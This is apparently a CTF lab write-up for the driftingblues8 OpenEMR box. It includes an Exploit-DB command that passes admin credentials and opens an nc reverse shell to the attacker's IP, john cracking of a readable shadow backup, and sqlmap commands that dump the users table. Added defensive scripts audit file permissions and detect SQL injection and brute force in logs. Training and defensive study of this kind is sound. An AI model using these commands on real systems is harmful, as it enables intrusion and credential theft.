OSCP Lab
Lab overview
Target: driftingblues8
Difficulty: easy
Techniques: standard enumeration, SQL injection, admin-panel brute force, shell via CMS exploit, cracking shadow with john
Information gathering
Host discovery
fping -aqg 192.168.1.0/24
Port scanning
└─# nmap -sV -A -p- -T4 192.168.1.191
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-26 21:25 EST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 192.168.1.191
Host is up (0.0011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:2D:64:D7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.08 ms 192.168.1.191
Directory scanning
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.191 -x php,txt,html
The scan turned up a useful wordlist file, so the next step is to brute-force the admin login.
The brute force recovered a username and password, and logging in with them succeeded.
Getting a foothold
Searching by the CMS version turns up quite a few published vulnerabilities.
python2 /usr/share/exploitdb/exploits/php/webapps/45161.py http://192.168.1.191 -u admin -p .:.yarrak.:.31 -c "nc 192.168.1.158 8989 -e /bin/bash"
Privilege escalation
Running the linpeas privilege-escalation script turned up the following useful information, including a backup copy of the shadow file:
/var/www/html/sites/default/sqlconf.php
/var/backups/shadow.backup
-rw-r--r-- 1 root root 943 Apr 25 2021 /var/backups/shadow.backup
-rwxrwxrwx 1 www-data www-data 2179 May 28 2018 /var/www/html/interface/main/backuplog.php
-rwxrwxrwx 1 www-data www-data 27999 May 28 2018 /var/www/html/interface/main/backup.php
-rwxrwxrwx 1 www-data www-data 1992 May 28 2018 /var/www/html/interface/main/backuplog.sh
-rwxrwxrwx 1 www-data www-data 1117 May 28 2018 /var/www/html/contrib/util/backup_oemr.sh
-rw-r--r-- 1 root root 303 Oct 26 2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 363752 Apr 30 2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 348 Nov 25 2020 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz
-rw-r--r-- 1 root root 2754 Jun 21 2019 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 6199 Mar 19 2021 /usr/lib/modules/4.19.0-16-686-pae/kernel/drivers/net/team/team_mode_activebackup.ko
-rwxr-xr-x 1 root root 38412 Nov 25 2020 /usr/bin/wsrep_sst_mariabackup
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
/var/www/html/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA.php
/var/www/html/vendor/doctrine/couchdb
Cracking shadow
Cracking the backup with john recovered the password of the clapton account.
john -w=/usr/share/wordlists/rockyou.txt shadow --format=crypt
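The root cause behind this step is visible in the linpeas output above: /var/backups/shadow.backup is mode 644 (readable by every local user), and several files under the web root are 777. The following Python script is an added example, not part of the write-up and not linpeas code; it parses `ls -l`-style lines (the sample lines are copied from the linpeas output above), flags shadow copies readable by others and world-writable files under the web root, and can run the same checks against a live filesystem with os.stat(). The assumption that web content lives under /var/www is the script's own.

```python
"""Audit an `ls -l`-style listing for the two weaknesses the linpeas output
above exposes: a copy of /etc/shadow readable by everyone, and files under
the web root that anyone can write. Added example; not linpeas code."""
import os
import pwd
import stat

# Sample lines copied from the linpeas output in the write-up.
SAMPLE_LISTING = """\
-rw-r--r-- 1 root root 943 Apr 25 2021 /var/backups/shadow.backup
-rwxrwxrwx 1 www-data www-data 2179 May 28 2018 /var/www/html/interface/main/backuplog.php
-rwxrwxrwx 1 www-data www-data 27999 May 28 2018 /var/www/html/interface/main/backup.php
-rw-r--r-- 1 root root 303 Oct 26 2018 /usr/share/doc/hdparm/changelog.old.gz
-rwxr-xr-x 1 root root 38412 Nov 25 2020 /usr/bin/wsrep_sst_mariabackup
"""

WEB_ROOTS = ("/var/www/",)   # assumption: web content lives under /var/www


def parse_ls_line(line):
    """Split one `ls -l` line into (mode_string, owner, path); None if malformed."""
    parts = line.split(None, 8)
    if len(parts) != 9 or len(parts[0]) != 10:
        return None
    return parts[0], parts[2], parts[8]


def check(mode, owner, path):
    """Return finding strings for one file given its symbolic mode and owner."""
    findings = []
    name = os.path.basename(path)
    other_readable = mode[7] == "r"
    other_writable = mode[8] == "w"
    # /etc/shadow is normally root:shadow 0640; any copy readable by 'other'
    # (or not owned by root) exposes password hashes to offline cracking.
    if "shadow" in name and (other_readable or owner != "root"):
        findings.append(f"shadow copy readable by others: {path} ({mode} {owner})")
    # World-writable files under the web root let any local user modify PHP.
    if path.startswith(WEB_ROOTS) and other_writable:
        findings.append(f"world-writable file under web root: {path} ({mode})")
    return findings


def audit_listing(text):
    """Run check() over every parseable line of an `ls -l` listing."""
    findings = []
    for line in text.splitlines():
        parsed = parse_ls_line(line)
        if parsed:
            findings.extend(check(*parsed))
    return findings


def audit_live(paths):
    """Same checks against the live filesystem via os.stat()."""
    findings = []
    for path in paths:
        try:
            st = os.stat(path)
        except OSError:
            continue   # missing or unreadable: nothing to report
        try:
            owner = pwd.getpwuid(st.st_uid).pw_name
        except KeyError:
            owner = str(st.st_uid)
        findings.extend(check(stat.filemode(st.st_mode), owner, path))
    return findings


if __name__ == "__main__":
    for finding in audit_listing(SAMPLE_LISTING):
        print(finding)
```

On a real host, `audit_live(["/var/backups/shadow.backup", "/etc/shadow"])` or a directory walk feeding `audit_live()` gives the same findings from stat data instead of a pasted listing; the fix for the first finding is `chmod 600` (or deleting the stale backup), and for the second, owning the web tree by root with 644/755 permissions.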
Escalating to root
There is a root-owned file here that even insults you: silly hacker! But the file is of no use.
Privilege escalation with the exploit failed:
clapton@driftingblues:/tmp$ gcc -c exp.c
clapton@driftingblues:/tmp$ gcc -o exp exp.o -lm
clapton@driftingblues:/tmp$ ls
exp exp.c exp.o linpeas.sh
clapton@driftingblues:/tmp$ chmod +x exp
clapton@driftingblues:/tmp$ ./exp
[+] Linux Privilege Escalation by theflow@ - 2021
[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[-] unshare(CLONE_NEWUSER): Operation not permitted
Only at this point did I notice that the wordlist.txt in clapton's home directory is not the same file as the wordlist.txt downloaded from the web directory. So the enumeration was still not careful enough!
That wordlist can then be used for another brute-force run. After trying it, it really did contain the root account's password.
Addendum
Here is another way in:
sqlmap -u 'http://192.168.1.191/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' -p enc -b --random-agent --batch
# sqlmap -u 'http://192.168.1.191/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' -p enc -b --random-agent --batch -D openemr -T users_secure -C username,password --dump
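Both web-facing steps of this write-up, the brute force against interface/login/login.php and the sqlmap run against the enc parameter of taskman.php, leave a clear trace in the Apache access log. The following Python script is an added example, not part of the write-up; it parses combined-format log lines, flags query-string values carrying SQL metacharacters or keywords, and flags any client that posts to the login page more than a threshold number of times. The log lines are constructed to resemble this box's URLs, not captured from it, and the threshold of 5 is the script's own choice.

```python
"""Detect the two web-facing techniques used in this write-up from Apache
combined-format access logs: a login brute force against OpenEMR's
interface/login/login.php and SQL injection probing of a query parameter
(here the enc parameter of interface/forms/eye_mag/taskman.php).
Added example code; the log lines below are constructed, not captured."""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Generic SQL metacharacters and keywords that do not belong in this app's
# numeric/enum parameters; tune per application to limit false positives.
SQLI_RE = re.compile(
    r"(['\"]|--|/\*|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|\bor\s+\d+\s*=\s*\d+)",
    re.I,
)
LOGIN_PATH = "/interface/login/login.php"

# Constructed sample: six POSTs to the login page from one client, one from
# another, then a normal taskman.php request followed by a probe with a quote.
SAMPLE_LOG = """\
192.168.1.158 - - [26/Dec/2023:21:40:01 -0500] "GET /interface/login/login.php?site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.158 - - [26/Dec/2023:21:40:02 -0500] "POST /interface/login/login.php?site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.158 - - [26/Dec/2023:21:40:02 -0500] "POST /interface/login/login.php?site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.158 - - [26/Dec/2023:21:40:03 -0500] "POST /interface/login/login.php?site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.158 - - [26/Dec/2023:21:40:03 -0500] "POST /interface/login/login.php?site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.158 - - [26/Dec/2023:21:40:04 -0500] "POST /interface/login/login.php?site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.158 - - [26/Dec/2023:21:40:04 -0500] "POST /interface/login/login.php?site=default HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.20 - - [26/Dec/2023:21:40:30 -0500] "POST /interface/login/login.php?site=default HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.158 - - [26/Dec/2023:21:41:10 -0500] "GET /interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.1.158 - - [26/Dec/2023:21:41:11 -0500] "GET /interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1%27%20OR%201%3D1--%20- HTTP/1.1" 200 812 "-" "Opera/9.80"
"""


def parse(line):
    """Return the fields of one combined-format line as a dict, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def sqli_params(url):
    """Return [(name, decoded_value)] for query parameters matching SQLI_RE."""
    query = urlsplit(url).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if SQLI_RE.search(v)]


def analyze(log_text, login_threshold=5):
    """Return alert tuples (kind, ip, path, detail_name, detail_value)."""
    alerts = []
    login_posts = Counter()
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        path = urlsplit(rec["url"]).path
        if rec["method"] == "POST" and path == LOGIN_PATH:
            login_posts[rec["ip"]] += 1
        for name, value in sqli_params(rec["url"]):
            alerts.append(("sqli", rec["ip"], path, name, value))
    for ip, count in login_posts.items():
        if count >= login_threshold:
            alerts.append(("login-bruteforce", ip, LOGIN_PATH, "posts", str(count)))
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Against a real server, `analyze(open("/var/log/apache2/access.log").read())` does the same over the live log. Note that sqlmap's --random-agent means the User-Agent is useless as a signal, which is why the detection keys on the decoded parameter values and on request volume rather than on the client string; POST bodies are not logged by default, so the login check counts attempts per source rather than inspecting submitted credentials.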
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】driftingblues8